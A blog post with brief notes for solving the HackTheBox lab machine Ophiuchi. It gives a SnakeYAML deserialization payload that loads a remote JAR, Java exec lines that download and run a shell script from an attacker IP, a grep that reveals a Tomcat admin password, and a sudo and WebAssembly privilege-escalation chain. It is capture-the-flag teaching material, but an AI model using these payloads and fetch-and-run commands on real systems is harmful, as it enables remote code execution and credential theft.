• Home
  • Blog
  • CTF
  • SnakeYAML, Go & WebAssembly – Ophiuchi @ HackTheBox

SnakeYAML, Go & WebAssembly – Ophiuchi @ HackTheBox

03Jul

SnakeYAML, Go & WebAssembly – Ophiuchi @ HackTheBox

By CTF , , , , ,

We are going to solve Ophiuchi a 30-point machine on HackTheBox that involves a YAML parser vulnerability and a custom program we can execute with sudo, which loads a web assembly file and executes a shell script without using the absolute path.

Notes

SnakeYAML Parser vulnerability:

  • https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
  • https://github.com/artsploit/yaml-payload

Change payload to:

Runtime.getRuntime().exec("wget 10.10.14.97/x -O /tmp/x");
Runtime.getRuntime().exec("/bin/sh /tmp/x");

Compile:

javac yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf payload.jar -C yaml-payload/src/ .

Send Exploit:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.97/payload.jar"]
  ]]
]

Get Admin Password:

grep -ir "password" .
/tomcat/conf/tomcat-users.xml:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>

WebAssembly “main.c”:

int info() {
    return 1;
}

Compile with emscripten:

sudo docker run --rm -v $(pwd):/src -u $(id -u):$(id -g) emscripten/emsdk emcc --no-entry main.c -s WASM=1 -o main.html -s "EXPORTED_FUNCTIONS=['_info']";

Transfer & Execute:

cd /tmp
curl 10.10.14.97/main.wasm > main.wasm
curl 10.10.14.97/x > deploy.sh
chmod +x deploy.sh
sudo /usr/bin/go run /opt/wasm-functions/index.go

Share this post

Author

Related Posts

16Feb

Giddy @ HackTheBox

In this post I will give a quick walkthrough on Giddy from hackthebox.eu. The machine involves (automated) sql injection, stealing... read more

16Mar

Carrier @ HackTheBox

Carrier is a nice, medium difficulty machine on hackthebox.eu featuring information retrieval via snmp, command injection and bgp hijacking. The... read more

02May

OpenAdmin @ HackTheBox

OpenAdmin is a 20-Point Linux machine on HackTheBox that involves using a public exploit for OpenNetAdmin & abusing a sudo... read more

27Apr

Irked @ HackTheBox

This short write-up is about Irked, a rather easy machine on hackthebox featuring an irc backdoor, some steganography and a... read more

18Apr

Mango @ HackTheBox

Mango is a 30-point linux machine on hackthebox that involves a NoSQL-Injection which allows to obtain user passwords from a... read more

27Feb

Academy @ HackTheBox

Solving Academy on HackTheBox, a 20-point Linux machine on HackTheBox that involves a Laravel deserialization RCE, stored credentials & sudo... read more

26Jun

WordPress & Initctl on ChromeOS – Spectra @ HackTheBox

My video about Spectra, a 20-point machine on HackTheBox that involves admin access to a WordPress site, allowing us to... read more

18May

Ellingson @ HackTheBox

Ellingson is fun and quick 40 points machine on hackthebox, featuring the abuse of the python/flask werkzeug debugger, cracking a... read more

12Jun

PHP Unserialize & Race Condition – Tenet @ HackTheBox

We are solving Tenet, a 30-point machine HackTheBox that involves a simple PHP deserialization vulnerability, password reuse and a race... read more

21Nov

Buff @ HackTheBox

Buff is a 20-point Windows Machine on HackTheBox, created by egotisticalSW. It involves 2 simple public exploits and forwarding a... read more